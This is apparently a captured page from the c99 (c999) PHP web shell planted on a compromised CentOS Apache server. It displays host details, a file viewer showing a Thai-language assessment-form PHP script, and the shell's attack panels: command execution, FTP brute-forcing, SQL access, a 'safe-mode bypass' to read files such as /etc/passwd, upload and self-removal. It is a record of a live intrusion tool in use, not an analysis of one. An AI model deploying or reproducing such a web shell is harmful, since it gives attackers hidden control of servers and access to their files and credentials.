!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/   drwxr-xr-x
Free 52.3 GB of 127.8 GB (40.92%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addNameDetail.php (3.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
showHeader();
include_once 
"../class/clsAssessForm.php";
include_once 
"../link/function.php";
checkFormat();
?>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<form name="FormInputNameAss" method="post" action="processAssForm.php">

<br>
  <table  width=90%  align=center>
    <tr> 
      <td> <fieldset>
        <input type="hidden" name="method" value="add">
        <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <a href="showListAss.php">รายการประเมิน</a><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"> เพิ่มข้อมูลแบบประเมิน </font></legend>
        <br><br>
        <table width="506" border="0" align="center">
          <tr> 
            <td height="25" colspan="2" align="center" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_4"];?>"><strong>กำหนดชื่อแบบประเมิน 
              คำชี้แจง และรายละเอียด</strong></td>
          </tr>
          <tr> 
            <td colspan="2">&nbsp;</td>
          </tr>
          <tr> 
            <td width="164" height="92" class="colinput1">&nbsp;ชื่อแบบประเมินตามรายงาน 
              <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">*</font><br>&nbsp;(ผู้สร้างแบบประเมินเป็นผู้เห็น)</td>
            <td width="332"><textarea name="maintopic" cols="50" rows="4"></textarea> 
            </td>
          </tr>
          <tr>
            <td class="colinput1">&nbsp;ชื่อแบบประเมินสำหรับผู้ตอบ <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">*</font><br>&nbsp;(ผู้ตอบแบบประเมินเป็นผู้เห็น)</td>
            <td><textarea name="nameAss" cols="50" rows="4"></textarea></td>
          </tr>
          <tr> 
            <td class="colinput1">&nbsp;คำชี้แจง <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">*</font></td>
            <td><textarea name="explains" cols="50" rows="4"></textarea></td>
          </tr>
          <tr> 
            <td class="colinput1">&nbsp;รายละเอียด </td>
            <td><textarea name="detailAss" cols="50" rows="4"></textarea></td>
          </tr>
          <tr> 
            <td colspan="2">&nbsp; </td>
          </tr>
          <tr> 
            <td colspan="2"><div align="center"> 
                <input type="submit" name="add" value="บันทึก" onClick="return checkFormat()">
                <input type="reset" name="clear" value="เคลียร์ข้อมูล">
                <input type="button" name="cancel" value="ยกเลิก" onClick="location.href = 'showListAss.php'">
              </div></td>
          </tr>
        </table>
        <br>
        </fieldset></td>
    </tr>
    <tr> 
      <td><br>
        <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"><b>หมายเหตุ 
        : </b> * หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</font></td>
    </tr>
  </table> 

</form>
<? showFooter(); ?>

<script language="javascript">
function checkFormat(){
    if(document.FormInputNameAss.nameAss.value==""){
        alert("กรุณากรอกชื่อทางการแบบประเมิน ");
        document.FormInputNameAss.nameAss.focus();
        return false;
    }    else if(document.FormInputNameAss.maintopic.value==""){
        alert("กรุณากรอกชื่อทั่วไปแบบประเมิน ");
        document.FormInputNameAss.maintopic.focus();
        return false;
    }    else if(document.FormInputNameAss.explains.value==""){
        alert("กรุณากรอกคำชี้แจง ");
        document.FormInputNameAss.explains.focus();
        return false;
    }
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--